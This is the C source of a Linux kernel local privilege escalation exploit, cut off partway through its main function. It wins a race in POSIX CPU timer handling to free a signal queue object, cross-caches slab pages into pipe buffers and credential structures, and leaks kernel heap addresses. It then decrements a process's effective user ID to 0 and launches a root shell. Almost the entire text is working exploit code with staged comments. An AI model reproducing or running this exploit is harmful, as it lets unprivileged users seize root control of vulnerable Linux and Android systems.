#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) #define PAGE_SIZE 0x1000uLL // For winning the races and extending // the race windows #define NUM_SAMPLES 100000 #define NUM_TIMERS 18 #define ONE_MS_NS 1000000uLL #define SYSCALL_LOOP_TIMES_MAX 300 #define EPOLL_COUNT 500 #define SFD_DUP_COUNT 100 // For synchronization between parent and child #define SUCCESS_CHAR 's' #define FAIL_CHAR 'f' #define SUCCESS_STR "s" #define FAIL_STR "f" // The following variables are target dependent. Some benchmarking can // be done from userland beforehand so that these variables aren't // needed, but just for this exploit, I manually set them to values // that work for me. You'll have to figure them out yourself. #define PARENT_SETTIME_DELAY_US 22000 #define PARENT_SETTIME_DELAY_US_DELTA 50 #define CPU_USAGE_THRESHOLD 22000 /* Global variables for exploit setup START */ // Thread synchronization in child process pthread_barrier_t barrier; // Timers used to stall `handle_posix_cpu_timers()` to extend the race window timer_t stall_timers[NUM_TIMERS]; // Thread that will trigger the timer handling, and also the thread that will // be reaped by the exploit parent process pthread_t race_thread; int exploit_child_to_parent[2]; int exploit_parent_to_child[2]; int sigusr1_sfds[SFD_DUP_COUNT]; // signalfd for increasing race window int sigusr2_sfds[SFD_DUP_COUNT]; // signalfd for detecting the UAF later. // Amount of LESS times to loop the `getpid()` syscall to waste CPU time int syscall_loop_times = 0; int race_retry_count = 0; // For debugging purposes pid_t exploit_child_pid, exploit_parent_pid; // BIG NOTE: The very first timer created by a process actually gets timer ID 0, // so checking for NULL here is not good enough to figure out whether a timer was // allocated or not. // // Instead, set these to -1, and check for -1 later. timer_t uaf_timer = (void *) -1, realloc_timer = (void *) -1; // The UAF timer handlers /* Global variables for exploit setup END */ /* Global variables for cross-cache START */ // `sigqueue_cachep` related constants. #define SIGQUEUE_objs_per_slab 51 #define SIGQUEUE_cpu_partial 30 #define SIGQUEUE_slab_count 33 #define SIGQUEUE_obj_size 80 // `struct sigqueue` related constants. #define SIGQUEUE_PREALLOC 1 #define SIGQUEUE_list_next_offset 0 #define SIGQUEUE_list_prev_offset 8 #define SIGQUEUE_info_si_signo_offset (24+0) #define SIGQUEUE_flags_offset 16 #define SIGQUEUE_user_offset 72 // `cred_jar` and `struct cred` related constants. #define CRED_JAR_slab_size 192 #define CRED_JAR_euid_offset 20 #define CRED_JAR_egid_offset 24 // This list holds the timers used for cross-caching (both times). timer_t cross_cache_timers[SIGQUEUE_slab_count][SIGQUEUE_objs_per_slab]; /* Global variables for cross-cache END */ /* Global variables for second stage START */ #define NUM_CRED_PROCS 1000 // Number of processes to spray `struct cred` objects with int parent_owns_uaf_sigqueue = 0; // Does the parent or child have the UAF sigqueue? pid_t buggy_pid = 0; // Parent / child process PID based on above /* Global variables for second stage END */ void pin_on_cpu(int i) { cpu_set_t mask; CPU_ZERO(&mask); CPU_SET(i, &mask); sched_setaffinity(0, sizeof(mask), &mask); } static inline long long ts_to_ns(const struct timespec *ts) { return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec; } // Helper function to fully drain a signalfd. // // WARNING!!!! THIS FUNCTION IS AI GENERATED!!! DO NOT USE XD int drain_signalfd(int sfd) { int sig_count = 0; for (;;) { struct signalfd_siginfo si; ssize_t n = read(sfd, &si, sizeof(si)); if (n > 0) { sig_count++; continue; } // drained some; keep going if (n == -1 && errno == EAGAIN) break; // fully drained if (n == -1 && errno == EINTR) continue; // interrupted; retry } return sig_count; } static inline size_t rdtsc_begin(void) { #if defined(ARM64) return rdtsc(); #else size_t a, d; asm volatile ("mfence"); asm volatile ("rdtsc" : "=a" (a), "=d" (d)); a = (d<<32) | a; asm volatile ("lfence"); return a; #endif } static inline size_t rdtsc_end(void) { #if defined(ARM64) return rdtsc(); #else size_t a, d; asm volatile ("lfence"); asm volatile ("rdtsc" : "=a" (a), "=d" (d)); a = (d<<32) | a; asm volatile ("mfence"); return a; #endif } // This function measures the average CPU time consumption of the `getpid()` syscall. // // Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls, // this works just fine. // // Can also actually return 0 if some weird scheduler behavior occurs and causes // the `total_nsec` to overflow, so ensure to check for that when calling it. // // Also, very important to be pinned to one CPU before running this! long int getpid_cpu_usage() { size_t (*times)[2] = malloc(NUM_SAMPLES * sizeof(size_t[2])); for (int i = 0; i < NUM_SAMPLES; i++) { times[i][0] = rdtsc_begin(); syscall(__NR_getpid); times[i][1] = rdtsc_end(); } size_t total_nsec = 0; for (int i = 0; i < NUM_SAMPLES; i++) { total_nsec += times[i][1] - times[i][0]; } free(times); long int getpid_avg = total_nsec / NUM_SAMPLES; return total_nsec / NUM_SAMPLES; } // Helper function to read from the reallocated pipe buffer data page. // // Reads `size` bytes at offset `offset` out of the pipe and return it in `buf`. // // NOTES: // - `buf` is assumed to be at least PAGE_SIZE bytes large. // - The pipe is assumed to be readable (i.e write_pipe() was // already called before this). void read_pipe(int pfds[2], size_t size, size_t offset, char *buf) { size_t ret = 0; if (size > PAGE_SIZE) { printf("read_pipe: size too big\n"); SYSCHK(-1); } // Read up to offset first, then read size bytes ret = SYSCHK(read(pfds[0], buf, offset)); if (ret != offset) { printf("read_pipe: offset read failed, offset %ld read %ld\n", offset, ret); SYSCHK(-1); } SYSCHK(read(pfds[0], buf, size)); } // Helper function to read from the reallocated pipe buffer data page. // // Writes `size` bytes out of `buf` into the pipe at offset `offset`. // // NOTES: // - `buf` is assumed to be at least PAGE_SIZE bytes large. // - This will clobber all data before offset. // TODO: void write_pipe(int pfds[2], size_t size, size_t offset, void *buf) { size_t ret = 0; if (size > PAGE_SIZE) { printf("write_pipe: size too big\n"); SYSCHK(-1); } // Write up to offset first, then write the data char zero_buf[offset]; memset(zero_buf, 0, offset); ret = SYSCHK(write(pfds[1], zero_buf, offset)); if (ret != offset) { printf("write_pipe: offset write failed, offset %ld wrote %ld\n", offset, ret); SYSCHK(-1); } ret = SYSCHK(write(pfds[1], buf, size)); if (ret != size) { printf("write_pipe: size write failed, size %ld wrote %ld\n", size, ret); SYSCHK(-1); } } // This function pre-allocates sigqueues very carefully for cross-caching (both times). // // NOTE: Ensure you are on the correct CPU before calling this function! void sigqueue_crosscache_preallocs() { // --------------------------------------------------------------------------------- // // NOTE: On a real android device, a bunch of sigqueues should be allocated first // so that all slab pages from per cpu partial lists, per node partial lists, etc // are used up. This can be done by just spamming real-time signals to some process // that's blocking them. // // I won't be doing that here, just going to assume this is being ran in QEMU on a // clean setup where the sigqueue cache's slab pages will not be on any per-cpu // or per-node partial lists. // // --------------------------------------------------------------------------------- // // Goal: get our UAF timer in the middle of slab 3. struct sigevent cross_cache_evt = {0}; cross_cache_evt.sigev_notify = SIGEV_NONE; // Allocate full slabs 1 and 2. for (int i = 0; i < 2; i++) { for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) { SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j])); } } // Allocate 25 objects in slab 3 for (int i = 0; i < 25; i++) { SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i])); } // Next allocation will be the sigqueue whose slab will be cross-cached. } // This function post-allocates sigqueues very carefully for cross-caching (both times). // // NOTE: Ensure you are on the correct CPU before calling this function! void sigqueue_crosscache_postallocs() { struct sigevent cross_cache_evt = {0}; cross_cache_evt.sigev_notify = SIGEV_NONE; // We have a freed sigqueue at the head of the freelist of slab 3 right now. Re-allocate // it plus the remaining 25 objects in that slab now. // // You can use this special value with a kernel patch to figure out where it's allocated. // This should reallocate on top of whatever sigqueue we are attempting to cross-cache. If // it doesn't, there's a bug in this exploit! // cross_cache_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][25])); cross_cache_evt.sigev_value.sival_ptr = (void *)0; // reset if it was set // Allocate the remaining 25 objects in slab 3. for (int i = 26; i < SIGQUEUE_objs_per_slab; i++) { SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i])); } // Allocate sigqueues for the remaining slabs. for (int i = 3; i < SIGQUEUE_slab_count; i++) { for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) { SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j])); } } } // This function frees the slab 3 page back to the page allocator by very // carefully freeing sigqueues in the `cross_cache_timers` list. void free_crosscache_sigqueues() { // Now, the target sigqueue should be in the middle of slab 3. // // Strategically free sigqueues to fill up the per-cpu partial list, but also // ensure that the target sigqueue's slab is fully freed before freeing the 32nd slab. // // Start by freeing the first and last object in slab 1. SYSCHK(timer_delete(cross_cache_timers[0][0])); SYSCHK(timer_delete(cross_cache_timers[0][SIGQUEUE_objs_per_slab-1])); // Now, free the first, and then objects 26 through 51 in slab 2. SYSCHK(timer_delete(cross_cache_timers[1][0])); for (int i = 25; i < SIGQUEUE_objs_per_slab; i++) { SYSCHK(timer_delete(cross_cache_timers[1][i])); } // Free all objects in slab 3 for (int i = 0; i < SIGQUEUE_objs_per_slab; i++) { SYSCHK(timer_delete(cross_cache_timers[2][i])); } // Free objects 1 through 25 in slab 4 for (int i = 0; i < 25; i++) { SYSCHK(timer_delete(cross_cache_timers[3][i])); } // For the remaining slabs up to `cpu_partial` (inclusive), free the first and last obj for (int i = 4; i < SIGQUEUE_cpu_partial+1; i++) { SYSCHK(timer_delete(cross_cache_timers[i][0])); SYSCHK(timer_delete(cross_cache_timers[i][SIGQUEUE_objs_per_slab-1])); } // Now, freeing one object from the `cpu_partial+1`th slab should trigger // `unfreeze_partials()`, which will move fully freed slabs (i.e slab 3) to // the page allocator. // // Free first and last sigqueue here just in case the first one is in the // slab overlapped with the previous index. SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][0])); SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][SIGQUEUE_objs_per_slab-1])); } void cleanup_crosscache_sigqueues() { // In this case, we can just timer_delete() every single timer without // checking for errors. If they exist, they will be deleted. Otherwise, // we'll see an error. for (int i = 0; i < SIGQUEUE_slab_count; i++) { for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) { timer_delete(cross_cache_timers[i][j]); } } } // This is the function responsible for triggering `handle_posix_cpu_timers()`. void race_func(void) { // Pin to same CPU as the `free_func()` thread. This is the first cross-cache // CPU. pin_on_cpu(3); // For the race condition trigger struct sigevent race_evt = {0}; race_evt.sigev_notify = SIGEV_SIGNAL; race_evt.sigev_signo = SIGUSR1; // For the UAF timer struct sigevent uaf_evt = {0}; uaf_evt.sigev_notify = SIGEV_SIGNAL; uaf_evt.sigev_signo = SIGUSR1; // SIGUSR1 for now // uaf_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // Detect this UAF timer prctl(PR_SET_NAME, "RACER"); // prctl(PR_SET_NAME, "REAPEE"); // KERNEL PATCH: 500ms delay with this // Send this thread's TID to the parent process, so the parent can attach to us. pid_t tid = (pid_t)syscall(SYS_gettid); SYSCHK(write(exploit_child_to_parent[1], &tid, sizeof(pid_t))); // sync 1 // Get the average CPU time usage of the `getpid()` syscall, so we // can use it for the trigger later long int getpid_avg = 0; // `getpid_cpu_usage()` can technically return 0, it's very rare but // if it does, just recalculate. while (getpid_avg == 0) { getpid_avg = getpid_cpu_usage(); } // Wait for parent to attach and continue us. pthread_barrier_wait(&barrier); // barrier 1 // Create the UAF timer on the first cross-cache CPU. // // NOTE: This must be the last timer created on this CPU's active slab! Because we will // free it and re-allocate over it in `free_func()`. SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &uaf_evt, &uaf_timer)); // Switch the pinned CPU after creating the UAF timer. This is important because // `free_func()` must be able to run concurrently to this, and we also don't want to // touch the active CPU slab of the cross-cache CPU! pin_on_cpu(2); // Create the remaining stall timers for extending the race window for (int i = 0; i < NUM_TIMERS; i++) { SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &race_evt, &stall_timers[i])); } // Wait for the main thread to arm the timers. This is to make sure // this thread does not use CPU time to arm the timers. pthread_barrier_wait(&barrier); // barrier 2 - wake up main thread pthread_barrier_wait(&barrier); // barrier 3 - wait for armed timers // Waste just the right amount of CPU time now without firing any of the timers. // // The logic here is that calling `getpid()` enough times to consume 1 ms of CPU time, // and then adding a threshold amount of times on top of that will ensure that the timers // fire BEFORE `do_exit()` is called. // // Then, subtract `syscall_loop_times` (which changes on each retry) to slowly reduce the // amount of CPU time being consumed, until the timers fire right after `exit_notify()` wakes // up the parent exploit process. // // Use a print statement in `free_func()` when it receives SIGUSR1 to figure out how often // the timers are firing, and adjust CPU_USAGE_THRESHOLD accordingly so that it fires sometimes, // but not every time. for (int i = 0; i < ((ONE_MS_NS / getpid_avg) + CPU_USAGE_THRESHOLD - syscall_loop_times); i++) { syscall(__NR_getpid); } // This `return` will trigger `do_exit()` in the kernel. The goal is for a scheduler interrupt // to occur and `handle_posix_cpu_timers()` to run after `exit_notify()` wakes up the parent // exploit process that called `waitpid()` on us. return; } void free_func(void) { pin_on_cpu(3); prctl(PR_SET_NAME, "FREE_FUNC"); // Set up a poll for SIGUSR1. As soon as we receive it, we know // we're in the race window. struct pollfd pfd = { .fd = sigusr1_sfds[0], .events = POLLIN }; // Poll for SIGUSR1. for (;;) { int ret = poll(&pfd, 1, 0); // Got SIGUSR1 from the first stall timer, in race window now. if (pfd.revents & POLLIN) { // Free the UAF timer now on CPU 3 (first cross-cache CPU). SYSCHK(timer_delete(uaf_timer)); // Immediately switch pinned CPU to 0 and wake up the parent exploit process. // // Parent exploit process will already have switched to CPU 3, so it can wake // up immediately and re-allocate the UAF timer. // // Important to reallocate in the parent process, so that the sighand locks are // different. pin_on_cpu(0); SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 4.SUCCESS // Use the barrier to let the child process continue now and handle // the SIGUSR1 signals. pthread_barrier_wait(&barrier); // barrier 4 break; } // Spurious wake-up check if (ret < 0 && errno == EINTR) continue; // Some unknown error occurred, pause to debug if (ret < 0) { perror("free_func poll"); getchar(); break; } } } // Stage 2 starts after: // // 1. The UAF sigqueue is freed. // 2. We still have a handle to in either the parent or child's pending list. // 3. The UAF sigqueue's pointers should point back to itself, making it // non-dequeueable by default. void second_stage_exploit() { struct signalfd_siginfo si; char m; // Create a signalfds for all three signals we need to dequeue later. sigset_t mask; sigemptyset(&mask); sigaddset(&mask, SIGUSR2); // signal used by UAF sigqueue int sigusr2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK)); sigemptyset(&mask); sigaddset(&mask, SIGRTMIN+1); // signal used by other sigqueue int sigrt1_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK)); sigemptyset(&mask); sigaddset(&mask, SIGRTMIN+2); // signal used for leaking task pending list addr int sigrt2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK)); // Prepare the buffer used by the reallocated pipe buffer data page. char buf[PAGE_SIZE]; memset(buf, 0, PAGE_SIZE); // Just double confirm we are pinned to the right cross-cache CPU. pin_on_cpu(3); printf("\n[+] Stage 2 - Cross-cache the UAF sigqueue's slab\n"); // Allocate the rest of the sigqueues for cross-cache sigqueue_crosscache_postallocs(); // Allocate a pipe for the pipe buffer data page later, and make it // non-blocking for error checking too. int realloc_pipefds[2]; SYSCHK(pipe(realloc_pipefds)); // Read end non-blocking int flags = fcntl(realloc_pipefds[0], F_GETFL, 0); SYSCHK(fcntl(realloc_pipefds[0], F_SETFL, flags | O_NONBLOCK)); // Write end non-blocking flags = fcntl(realloc_pipefds[1], F_GETFL, 0); SYSCHK(fcntl(realloc_pipefds[1], F_SETFL, flags | O_NONBLOCK)); // Now free the UAF sigqueue's page back to the page allocator. free_crosscache_sigqueues(); // Realloc UAF sigqueue as a pipe buffer page immediately after it's freed. // This is done by writing to the pipe. SYSCHK(write(realloc_pipefds[1], buf, PAGE_SIZE)); printf("\t[+] Reallocated UAF sigqueue slab as a pipe buffer data page\n"); printf("\t[+] Cleaning up all cross-cache allocations to prepare for next cross-cache\n"); // We will be cross-caching again very soon, so free all other cross-cache sigqueues. // NOTE: do this on the same CPU as the first cross-cache. cleanup_crosscache_sigqueues(); printf("\t[+] Preparing task pending list for heap leaks\n"); // Switch CPUs to start on a clean slate for the second cross-cache. pin_on_cpu(2); // Do the preallocs same as before. sigqueue_crosscache_preallocs(); // Send a new signal to the process to fill in the UAF sigqueue's next pointer // Use `tkill()` as that uses the task's pending list. `kill()` uses the // shared pending list instead. // // This sigqueue is allocated after the preallocs. SYSCHK(syscall(__NR_tkill, buggy_pid, SIGRTMIN+1)); // Before dequeueing the SIGRTMIN+2 signal, switch back to a non-cross-cache CPU. // // This is because this signal was prepared on a non-cross-cache CPU in the first // place, and we aren't using it in the cross-cache, so in order to not mess with // the cross-cache, we have to free it on a different CPU. pin_on_cpu(1); // NOTE: If the `buggy_pid` points to the child process, we have to ask the // child process to dequeue the signal for us. if (parent_owns_uaf_sigqueue) { // Dequeueing this signal will put the pointer of our task struct's pending list // into the ->prev pointer of the UAF sigqueue. SYSCHK(read(sigrt2_sfd, &si, sizeof(si))); } else { // Child will dequeue the signal for us. Wait for it to finish. SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 2 SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 3 } // Now switch back to the second cross-cache CPU pin_on_cpu(2); // Scan the pipe buffer data page for the `next` and `prev` pointer to store them. // Everything will be zeroes except those pointers at this point in time. read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); size_t other_sigqueue_addr = 0; size_t task_pending_list_addr = 0; size_t uaf_sigqueue_offset = 0; // Increment by `SIGQUEUE_obj_size` and look at the `next` pointer offset. for (int i = 0; i < PAGE_SIZE; i += SIGQUEUE_obj_size) { other_sigqueue_addr = *((size_t *)(buf + (i + SIGQUEUE_list_next_offset))); if (other_sigqueue_addr) { uaf_sigqueue_offset = i; task_pending_list_addr = *((size_t *)(buf + (i + SIGQUEUE_list_prev_offset))); printf("\t[+] Heap leaks:\n"); printf("\t\t- UAF sigqueue page offset 0x%lx\n", uaf_sigqueue_offset); printf("\t\t- Other sigqueue 0x%lx\n", other_sigqueue_addr); printf("\t\t- Task pending list addr 0x%lx\n", task_pending_list_addr); break; } } // Set up the UAF sigqueue so we can leak it's own address now. // Key points are: // // 1. Setting `next` and `prev` both to the other sigqueue's address ensures // that the UAF sigqueue's pointer stays in the task pending list. // 2. `info.si_signo` must be set to SIGUSR2, otherwise the signal will not // be dequeued. // 3. `SIGQUEUE_PREALLOC` does not technically need to be set, but I just do it anyway. memset(buf, 0, PAGE_SIZE); *((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next *((size_t *)(buf + SIGQUEUE_list_prev_offset)) = other_sigqueue_addr;// list->prev *((int *)(buf + SIGQUEUE_flags_offset)) = SIGQUEUE_PREALLOC; // flags *((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGUSR2; // info->si_code write_pipe(realloc_pipefds, SIGQUEUE_info_si_signo_offset + sizeof(int), uaf_sigqueue_offset, buf); // Now drain the UAF sigqueue's signal to write it's own pointers back into itself. // This will happen because of the `list_del_init()` in `collect_signal()`. // // NOTE: This overwrites the other sigqueue's `next` and `prev` pointers to point // back to the other sigqueue's address. However, the task pending list's // `prev` pointer still points to other sigqueue's address. Basically, // when we free the other sigqueue soon, the task pending list's `prev` // pointer won't be updated. // // All this means is that we can't append anymore signals to this task's pending // list after this point. // // NOTE: After this, SIGUSR2 is removed from the task's signal mask, but // SIGRTMIN+1 stays. // // NOTE: If the `buggy_pid` points to the child process, we have to ask the // child process to dequeue the signal for us. if (parent_owns_uaf_sigqueue) { SYSCHK(read(sigusr2_sfd, &si, sizeof(si))); } else { SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 4 SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 5 } // Read the UAF sigqueue's own address now through the pipe buffer size_t uaf_sigqueue_addr = 0; read_pipe(realloc_pipefds, 8, uaf_sigqueue_offset, buf); uaf_sigqueue_addr = *((size_t *)(buf + SIGQUEUE_list_next_offset)); printf("\t\t- UAF sigqueue address 0x%lx\n", uaf_sigqueue_addr); // Now free the other sigqueue back to the freelist of it's slab page. // // Since our UAF sigqueue is at the head of the pending list, set it's next pointer // to point to the other sigqueue so the list can be traversed to it. read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe *((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next write_pipe(realloc_pipefds, SIGQUEUE_list_next_offset + sizeof(size_t), uaf_sigqueue_offset, buf); // Finally, dequeue the other signal's sigqueue and free it. It's SIGRTMIN+1. // // NOTE: If the `buggy_pid` points to the child process, we have to ask the // child process to dequeue the signal for us. if (parent_owns_uaf_sigqueue) { SYSCHK(read(sigrt1_sfd, &si, sizeof(si))); } else { SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 6 SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 7 } printf("\n[+] Stage 3 - Cross-cache the other sigqueue's slab\n"); // Now, second cross-cache post allocs. The target sigqueue is the // other sigqueue, which was just freed. sigqueue_crosscache_postallocs(); // Before freeing the other sigqueue's slab page back to the page allocator, // fork NUM_CRED_PROCS processes. Do this on a non-cross-cache CPU. // // This is preparing for the `struct cred` spray later. pin_on_cpu(1); printf("\t[+] Preparing %d processes for future `struct cred` spray\n", NUM_CRED_PROCS); int cred_parent_pfds[2]; int cred_child_pfds[2]; SYSCHK(pipe(cred_parent_pfds)); SYSCHK(pipe(cred_child_pfds)); for (int i = 0; i < NUM_CRED_PROCS; i++) { pid_t pid = SYSCHK(fork()); if (!pid) { // child process SYSCHK(close(cred_parent_pfds[1])); SYSCHK(close(cred_child_pfds[0])); // Wait for the parent to wake us up to call `setresuid(-1,-1,-1) SYSCHK(read(cred_parent_pfds[0], &m, 1)); // Pin on same CPU as the cross-cache CPU before calling // `setresuid(-1,-1,-1)`. This allocates one cred struct. pin_on_cpu(2); SYSCHK(setresuid(-1,-1,-1)); // Reset CPU and let the parent know we finished. pin_on_cpu(1); SYSCHK(write(cred_child_pfds[1], &m, 1)); // Wait for the parent to potentially decrement our EUID to 0. SYSCHK(read(cred_parent_pfds[0], &m, 1)); // Check our EUID uid_t euid = geteuid(); // If we have root privs now, just spawn a shell if (euid == 0) { printf("\t[+] Found child process with euid=%d!\n", euid); printf("\t[+] Spawning root shell...\n"); printf("\n"); printf("\n"); printf("\n"); // Must set our UID and GID to 0 as well. "/bin/sh" seems to do a // `setuid(getuid())`, and since the we only changed our EUID, // that resets our privs here. setresuid(0, 0, 0); setresgid(0, 0, 0); system("/bin/sh"); } else { // Parent won't wake us up anymore, wake up the parent and // block forever SYSCHK(write(cred_child_pfds[1], &m, 1)); SYSCHK(read(cred_parent_pfds[0], &m, 1)); } } } // Continuing in the parent process now. SYSCHK(close(cred_parent_pfds[0])); SYSCHK(close(cred_child_pfds[1])); // For later, pick the second cred object in the other sigqueue's slab arbitrarily. size_t target_cred_addr = (other_sigqueue_addr & ~0xfff) + CRED_JAR_slab_size; printf("\t[+] Target cred object to modify will be at 0x%lx\n", target_cred_addr); // Now free the other sigqueue's slab page, make sure to switch CPUs back to the // second cross-cache CPU! pin_on_cpu(2); free_crosscache_sigqueues(); // Wake up each child process to call `setresuid(-1,-1,-1)` // // NOTE: Writing to the pipe will allocate new pages. Switch // to a non-cross-cache CPU to do this. pin_on_cpu(1); for (int i = 0; i < NUM_CRED_PROCS; i++) { SYSCHK(write(cred_parent_pfds[1], &m, 1)); SYSCHK(read(cred_child_pfds[0], &m, 1)); } printf("\t[+] Reallocated other sigqueue's slab as a `struct cred` page\n"); printf("\n[+] Stage 4 - Decrement EUID of target cred to 0\n"); // At this point, SIGUSR2 will have been removed from the task's pending signal mask, // but SIGRTMIN+1 will still be on it. Set up the UAF sigqueue to use SIGRTMIN+1. // // Setting up the `user` pointer to `target_address - 8` gives us an arbitrary // decrement primitive. Point this to the target cred's EUID offset - 8. read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe memset(buf, 0, PAGE_SIZE); *((size_t *)(buf + SIGQUEUE_list_next_offset)) = uaf_sigqueue_addr; // list->next *((size_t *)(buf + SIGQUEUE_list_prev_offset)) = uaf_sigqueue_addr;// list->prev *((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGRTMIN+1; // info->si_code *((size_t *)(buf + SIGQUEUE_user_offset)) = target_cred_addr + CRED_JAR_euid_offset - 8uLL; // user write_pipe(realloc_pipefds, SIGQUEUE_user_offset + sizeof(size_t), uaf_sigqueue_offset, buf); // Arbitrary decrement time! Decrement target cred's EUID to 0. This process // will have the same UID as the target cred, so we can use that to know // how many times to decrement. // // NOTE: If the `buggy_pid` points to the child process, we have to ask the // child process to dequeue the signal for us. if (parent_owns_uaf_sigqueue) { for (int i = 0; i < getuid(); i++) { SYSCHK(read(sigrt1_sfd, &si, sizeof(si))); } } else { SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 8 SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 9 } printf("\t[+] Exploit finished. Searching for child with EUID 0...\n"); // Now wake up each child process to check which one is root. // If we find the root process, we'll block forever and the child // can launch a shell. for (int i = 0; i < NUM_CRED_PROCS; i++) { SYSCHK(write(cred_parent_pfds[1], &m, 1)); SYSCHK(read(cred_child_pfds[0], &m, 1)); } // If we ever get here, the exploit failed for some reason. printf("[!!!] Exploit failed! I have no idea why XD try again?\n"); } int main(int argc, char *argv[]) { // exploit process char m; // Parent and child setup // Use pipes to communicate between parent and child SYSCHK(pipe(exploit_child_to_parent)); SYSCHK(pipe(exploit_parent_to_child)); pid_t pid = SYSCHK(fork()); if (pid) { // exploit parent process pin_on_cpu(0); close(exploit_child_to_parent[1]); close(exploit_parent_to_child[0]); prctl(PR_SET_NAME, "EXPLOIT_PARENT"); pid_t racer_tid; // Reallocated timer event - use SIGUSR2 as it will be easy to // tell we won the race if we ever receive SIGUSR2 on the child thread. // // Send the signal to ourself specifically, so it uses our pending // list instead of the shared pending list. struct sigevent realloc_evt = {0}; realloc_evt.sigev_notify = SIGEV_SIGNAL | SIGEV_THREAD_ID; realloc_evt.sigev_signo = SIGUSR2; realloc_evt._sigev_un._tid = (pid_t)syscall(SYS_gettid); // realloc_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // For debugging // Create SIGUSR2 sfd, and block SIGUSR2 and SIGRTMIN+1 and SIGRTMIN+2 on this process. sigset_t block_mask; sigemptyset(&block_mask); sigaddset(&block_mask, SIGUSR2); int sigusr2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));\ sigaddset(&block_mask, SIGRTMIN+1); sigaddset(&block_mask, SIGRTMIN+2); SYSCHK(sigprocmask(SIG_BLOCK, &block_mask, NULL)); // itimerspec that fires the time immediately when used with `TIMER_ABSTIME`. struct itimerspec fire_ts = {0}; fire_ts.it_value.tv_nsec = 1; int parent_settime_delay = PARENT_SETTIME_DELAY_US; // int parent_settime_delay = 200 * 1000; // KERNEL PATCH: 200ms delay // Prepare the preallocs for cross-cache for parent process // NOTE: Must be on CPU 3! pin_on_cpu(3); sigqueue_crosscache_preallocs(); pin_on_cpu(0); // On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal. // This is used later to leak the task pending list address. pid_t my_pid = (pid_t)syscall(SYS_gettid); SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2)); while (1) { // Initially pin to CPU 0 pin_on_cpu(0); // Reset `realloc_timer` on each try. realloc_timer = (void *) -1; // Receive child process's RACER thread's TID for reaping later SYSCHK(read(exploit_child_to_parent[0], &racer_tid, sizeof(pid_t))); // sync 1 // Attach to the RACER thread and continue it SYSCHK(ptrace(PTRACE_ATTACH, racer_tid, NULL, NULL)); SYSCHK(waitpid(racer_tid, NULL, __WALL)); SYSCHK(ptrace(PTRACE_CONT, racer_tid, NULL, NULL)); // Signal to child that we attached and continued SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 2 // Reap the RACER thread. // // At this point, this should block while the RACER thread is consuming CPU // time. There are three possible outcomes: // // 1. If the RACER thread exits and enters `handle_posix_cpu_timers()` AFTER // `do_exit() -> exit_notify()` has woken us up. `waitpid()` will reap the // RACER thread at that point and allow the timer to be freed. // // 2. If the RACER thread fires timers too early, then we'll just wake up // after the race window is completely gone. // // 3. If the RACER thread never fires the timers, we'll also return after the // race window is completely gone. SYSCHK(waitpid(racer_tid, NULL, __WALL)); // Assume we won the race for now. Only the child process can tell us for sure. // Child process will be waiting for us to let it know after `waitpid()` returns. SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 3 // Child process `free_func()` thread lets us know when it freed the UAF timer so // we can re-allocate it. // // Ensure to switch to CPU 3 before re-allocating. pin_on_cpu(3); SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 4 // Either `free_func()` sends us SUCCESS, or the child process main thread sends us FAIL. // In the success case, we are potentially in the race window with a freed timer. if (m == SUCCESS_CHAR) { // At this point, we know that the timers fired, because the SUCCESS_STR is only // sent by the `free_func()` thread. // // But we don't know if we won the 1st 